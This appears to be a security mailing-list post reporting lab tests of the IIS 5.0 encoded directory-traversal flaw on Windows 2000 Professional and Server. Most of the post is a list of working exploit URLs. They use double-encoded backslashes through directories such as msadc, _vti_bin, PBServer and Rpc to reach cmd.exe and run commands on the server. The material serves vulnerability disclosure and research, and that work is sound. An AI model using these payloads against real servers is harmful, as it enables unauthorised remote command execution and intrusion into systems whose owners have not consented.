Hi, We tested various settings in our lab, with different encoding combinations, executable directories, and Win32 configurations. Curiously, not all combinations worked quite the same way on Windows 2000 Server and Professional (even discounting the fact that certain directories exist in one and not in the other, like PBServer or Rpc). - Windows 2000 Professional + SP1 + IIS5.0 - Default installation * The following combinations of directories/encodings work: http://www.target.com/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd .exe?/c+dir+c:\ http://www.target.com/msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd .exe?/c+dir+c:\ http://www.target.com/msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system 32/cmd.exe?/c+dir+c:\ http://www.target.com/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/ system32/cmd.exe?/c+dir+c:\ http://www.target.com/MSADC/..%255c..%255c..%255c..%255cwinnt/system32/cmd.e xe?/c+dir+c:\ http://www.target.com/MSADC/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.e xe?/c+dir+c:\ http://www.target.com/MSADC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system 32/cmd.exe?/c+dir+c:\ http://www.target.com/MSADC/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winn t/system32/cmd.exe?/c+dir+c:\ http://www.target.com/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/s ystem32/cmd.exe?/c+dir+c:\ http://www.target.com/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/s ystem32/cmd.exe?/c+dir+c:\ http://www.target.com/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63 ../winnt/system32/cmd.exe?/c+dir+c:\ http://www.target.com/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63. .%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\ - Windows 2000 Server + SP1 + IIS5.0 - Default installation * The following combinations of directories/encodings work: http://www.target.com/PBServer/..%255c..%255c..%255cwinnt/system32/cmd.exe?/ c+dir+c:\ http://www.target.com/PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/ c+dir+c:\ http://www.target.com/PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd .exe?/c+dir+c:\ http://www.target.com/PBServer/..%25%35%63..%25%35%63..%25%35%63winnt/system 32/cmd.exe?/c+dir+c:\ http://www.target.com/Rpc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir +c:\ http://www.target.com/Rpc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir +c:\ http://www.target.com/Rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe? /c+dir+c:\ http://www.target.com/Rpc/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cm d.exe?/c+dir+c:\ http://www.target.com/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/s ystem32/cmd.exe?/c+dir+c:\ http://www.target.com/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/s ystem32/cmd.exe?/c+dir+c:\ http://www.target.com/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63 ../winnt/system32/cmd.exe?/c+dir+c:\ http://www.target.com/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63. .%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\ It would be interesting if tests were also made by others in NT 4.0 SP6a, since we did not test combinations with other commonly-installed directories, such as cgi-bin, adsamples, _vti_cnf,iisadmpwd, etc. Regards, Aldo Albuquerque - CCSA Tempest Security Technologies - http://www.tempest.com.br CESAR - Centro de Estudos e Sistemas Avan�ados do Recife - http://www.cesar.org.br
